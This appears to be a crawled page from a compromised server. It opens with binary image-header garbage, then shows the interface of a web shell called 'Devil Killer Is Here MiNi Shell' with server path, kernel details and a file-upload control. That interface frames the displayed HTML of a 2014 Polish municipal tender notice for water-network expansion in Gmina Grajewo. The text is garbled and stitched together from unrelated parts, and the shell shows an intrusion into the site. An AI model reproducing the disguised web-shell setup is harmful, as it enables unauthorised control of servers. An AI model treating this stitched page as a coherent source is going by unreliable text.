JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140610/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140610/125401-N-2014.html

<p class="kh_header"><b>Grajewo: Rozbudowa sieci wodociągowej na terenie Gminy Grajewo oraz remont SUW w m. Białaszewo</b><br>
<b>Numer ogłoszenia: 125401 - 2014; data zamieszczenia: 10.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Grajewo , ul. Komunalna 6, 19-200 Grajewo, woj. podlaskie, tel. 86 272 3000, faks 86 272 3000.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminagrajewo</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa sieci wodociągowej na terenie Gminy Grajewo oraz remont SUW w m. Białaszewo.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1. Rozbudowa sieci wodociągowej na terenie Gminy Grajewo, w skład
    której wchodzi n/w zakres rzeczowy robót zgodnie z dokumentacja projektową, 
    przedmiarami robót, specyfikacjami technicznymi wykonania i odbioru robót:
    * sieć rozdzielcza z PVC Danówek
       - roboty ziemne sieć fi 110 mm
       - roboty montażowe sieć fi 110 mm - 252m
       - roboty ziemne sieć fi 40 mm
       - roboty budowlano-montażowe fi 40 mm - 31m
      * sieć rozdzielcza z PVC Sojczyn Borowy
       - roboty ziemne
       - roboty montażowe sieć fi 110 mmm - 1033,5 m
      * sieć rozdzielcza z PVC Toczyłowo
       - roboty geodezyjne
       - roboty ziemne
       - roboty budowlano- montażowe sieć fi 110 mm - 2174 m
       - inne roboty
      * sieć rozdzielcza z PVC Modzelówka cz. II
       - roboty ziemne
       - roboty montażowe sieć fi 90 mm - 161,5 m
      * siec rozdzielcza z PVC Modzelówka cz. I
      - roboty ziemne
      - roboty budowlano- montażowe sieć fi 110 mm - 560 m 
      Zadanie 2. Remont stacji wodociągowej w m. Białaszewo, w skład której wchodzi 
      n/w zakres rzeczowy robót zgodnie z dokumentacja projektową, przedmiarami 
      robót, specyfikacjami technicznymi wykonania i odbioru robót:
      -  roboty wstępne
      - mieszacz wodno-powietrzny
      - hydrofiltr
      - hydrofor
      - badanie + podłączenie sieci
      - zakup i podłączenie agregatu prądotwórczego samojezdnego o mocy 60 kVA.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.10.00-5, 45.23.24.30-5, 45.30.00.00-0, 45.25.21.26-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każda składana oferta musi być zabezpieczona wadium w wysokości: 
    26 000,00 zł - słownie: dwadzieścia sześć tysięcy złotych - dla części zamówienia
                            Rozbudowa sieci wodociągowej na terenie Gminy Grajewo
      3 800,00 zł - słownie: trzy tysiące osiemset złotych - dla części zamówienia
                            Remont SUW w m. Białaszewo.
     Wadium może być wnoszone w następujących formach
     1) pieniądzu (wyłącznie przelewem na rachunek bankowy zamawiającego),
     2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-
         kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
     3) gwarancjach bankowych,
     4) gwarancjach ubezpieczeniowych,
     5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 
         pkt. 2 ustawy z dnia  9 listopada  2000 r. o utworzeniu Polskiej Agencji 
         Rozwoju Przedsiębiorczości.
     Wadium wnoszone w formie pieniądza należy wpłacić na konto Zamawiającego
     BS  Szczuczyn   o/Grajewo nr: 42 8768 1013 1310 3105 2000 0020</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje wymagań w zakresie ww warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie powyższego warunku Zamawiający uzna wykonanie z należytą starannością w okresie pięciu ostatnich lat (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), przed upływem terminu składania ofert, dla zadania 1 - co najmniej dwóch zadań polegających na budowie sieci wodociągowej o minimalnej długości 4 km każda i wartości brutto minimum 250 000,00zł każda, dla zadania 2 - co najmniej jednego zadania polegającego na budowie, przebudowie, modernizacji, remoncie stacji uzdatniania wody o wydajności 50 m3/h i wartości minimum 250 000,00zł, - z podaniem jego rodzaju i wartości, daty i miejsca wykonania - według wzoru stanowiącego załącznik nr 3 do SIWZ, a także załączeniem poświadczeń wystawionych przez podmioty na rzecz których wykonano zamówienie lub innych dokumentów jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Zamawiający informuje, że Wykonawca, w miejsce poświadczeń o których mowa, może przedkładać dokumenty potwierdzające należyte wykonanie robót budowlanych zgodnie z zasadami sztuki budowlanej i ich prawidłowe ukończenie, określone w § 1 ust. 2 pkt 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 luty 2013r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2013r., poz. 231).
W przypadku gdy Zamawiający jest podmiotem, na rzecz którego roboty budowlane wskazane w wykazie zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów. Na podstawie złożonych dokumentów Zamawiający dokona oceny spełnienia wymaganego warunku wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje wymagań w zakresie ww warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie powyższego warunku zamawiający uzna dysponowanie potencjałem kadrowym niezbędnym do realizacji zamówienia tj. co najmniej jedną osobę - posiadającą uprawnienia budowlane do kierowania robotami sanitarnymi, tj. posiadającą uprawnienia budowlane w specjalności sieci instalacji i urządzeń: wodociągowych i kanalizacyjnych, cieplnych, wentylacyjnych (VI ust. 2 pkt 1 SIWZ) wydane na podstawie ustawy Prawo budowlane (tj. Dz. U. z 2013r. poz. 1409 ze zm.) lub odpowiadające im równoważne uprawnienia w tej specjalności, które zostały wydane na podstawie wcześniej obowiązujących przepisów -  zgodnie z polskim Prawem Budowlanym. Osoba z uprawnieniami musi posiadać min. 2 letnie doświadczenie na stanowisku kierownika robót - dotyczy obu zadań.
Zamawiający uzna za spełniony powyższy warunek, jeżeli Wykonawca w zakresie dysponowania osobą przedstawi wykaz zgodnie z załącznikiem nr 4 do SIWZ oraz złoży oświadczenie o posiadaniu uprawnień przez tę osobę zgodnie z załącznikiem nr 5 do SIWZ
Na podstawie złożonych dokumentów Zamawiający dokona oceny spełnienia wymaganego warunku wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Należy przedstawić informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Należy wykazać posiadanie na rachunku Wykonawcy środków finansowych w wysokości min. 300 000,00 zł dla zadania 1 i 200 000,00 zł dla zadania 2, lub należy załączyć oświadczenie z banku o zdolności kredytowej do wysokości min. 300 000,00 zł dla zadania 1 i 200 000,00 zł dla zadania 2.
Na podstawie złożonych dokumentów Zamawiający dokona oceny spełnienia wymaganego warunku wg formuły: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1). Oferta na formularzu ofertowym o treści zgodnej z określoną we wzorze - zał. nr 1
     do SIWZ.
2). Kosztorysy ofertowe robót budowlanych opracowane metodą kalkulacji 
     szczegółowej, jako sumy iloczynów: ilości ustalonych jednostek przedmiarowych 
     robót, jednostkowych nakładów rzeczowych i ich cen oraz doliczonych 
     odpowiednio kosztów pośrednich, zakupu i zysku, z uwzględnieniem podatku od 
     towarów i usług(VAT), na podstawie załączonego do SIWZ przedmiaru robót. 
     Każdy kosztorys musi zawierać tabelę elementów scalonych oraz zestawienia R, 
     M i S. Dla zadania 1 odrębnie dla każdego obszaru,czyli 5 kosztorysów    
     ofertowych, a dla zadania 2 -  jeden kosztorys ofertowy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający informuje, że postanowienia umowy mogą zostać zmienione w następującym zakresie:
1. Termin realizacji zamówienia może ulec zmianie ze względu na: 
    a) wyjątkowo niesprzyjające warunki atmosferyczne uniemożliwiające wykonanie 
        robót zgodnie z zasadami współczesnej wiedzy technicznej i obowiązujący  
        przepisami,
    b) zaistniałe warunki terenowe, geologiczne, archeologiczne, wodne - utrudniające 
        wykonanie umowy,
    c) niezawinione przez wykonawcę ograniczenia dostępności placu budowy w 
        czasie realizacji robót,
   d) wstrzymanie przez Zamawiającego wykonania robót nie wynikających z 
       okoliczności leżących po stronie Wykonawcy. (Nie dotyczy okoliczności 
       wstrzymania robót przez inspektora nadzoru zamawiającego w przypadku 
       stwierdzenia nieprawidłowości zawinionych przez wykonawcę) - termin ten może 
       ulec przedłużeniu nie dłużej jednak niż o czas trwania tych okoliczności,
    e) kolizje wykonywanej inwestycji z innymi inwestycjami,
    f) wstrzymanie robót z powodu okoliczności zaistniałych po stronie Zamawiającego,
    g) opóźnienie w wykonaniu innych zadań prowadzonych przez zamawiającego w 
        ramach tej samej inwestycji, które wstrzymują wykonanie przedmiotowego 
        zadania,
    h) opóźnienia w uzyskaniu od organów administracji wymaganych aktów (decyzji, 
        pozwoleń itp.),
    i) wystąpienie siły wyższej,
2. Zmniejszenie ilości zamówienia - wynikające z faktu, iż realizacja tej części stała 
    się dla Zamawiającego nieuzasadniona społecznie lub ekonomicznie. 
3. Zmiana harmonogramu rzeczowo-finansowego z powodu zmniejszenia zakresu 
    rzeczowego, zmiany terminu kolejności wykonania poszczególnych zakresów
    rzeczowych.
4. Zmniejszenie wynagrodzenia z powodu ograniczenia zamówienia, lub ograniczenia 
    czy zmniejszenia dofinansowania ze względu na interes publiczny, co nie było do 
    przewidzenia w dniu zawarcia umowy.
5. Zmiana VAT lub stawek celnych.
6. Zmiana prawa mająca wpływ na termin lub zakres zamówienia.
7. Konieczność wykonania robót dodatkowych, zamiennych lub nieprzewidzianych 
    potwierdzonych przez Zamawiającego przy zachowaniu tych samych stawek 
    kalkulacyjnych co w kosztorysach ofertowych.

    Pozostałe dopuszczalne zmiany umowy:
    * zmiany w zakresie rozszerzenia odpowiedzialności z tytułu rękojmi poprzez 
       wydłużenie terminu rękojmi oraz przedłużenie terminu udzielonej gwarancji w 
       przypadku zaproponowania takiego rozwiązania przez Wykonawcę,
    * zmiany w zakresie zmiany podwykonawców w przypadku:
       - rezygnacji podwykonawcy,
       - zmiany wartości lub zakresu robót wykonywanych przez podwykonawców.
    * zmiany kluczowego personelu Zamawiającego i Wykonawcy z powodu:
       - śmierci, choroby, rezygnacji, zwolnienia pracownika lub innych zdarzeń 
         losowych 
         dotyczących  kierownika budowy,  kierowników robót lub inspektora nadzoru,
       - zastrzeżeń jednej ze stron, co do kompetencji kierownika budowy lub 
         inspektora nadzoru,
       - zmiany kierownika budowy - nowy kierownik budowy musi spełniać wymagania 
         określone w SIWZ dla kierownika budowy,
       - zmiany dokumentacji ze względu na postęp technologiczny,
       - zmiany prawa mającej wpływ na termin lub zakres zamówienia
       - zmian technicznych ze względu na niedostępność na rynku materiałów lub 
          urządzeń wskazanych w ofercie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.ug.grajewo.wrotapodlasia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Grajewo, 19-200 Grajewo, ul. Komunalna 6. Koszt SIWZ w wersji papierowej- 250 zł + koszt przesyłki wg operatora..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.06.2014 godzina 10:00, miejsce: Urząd Gminy Grajewo, ul. Komunalna 6, 19-200 Grajewo.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt otrzymał pomoc finansową w ramach działania Podstawowe usługi dla gospodarki i ludności wiejskiej objętego PROW na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
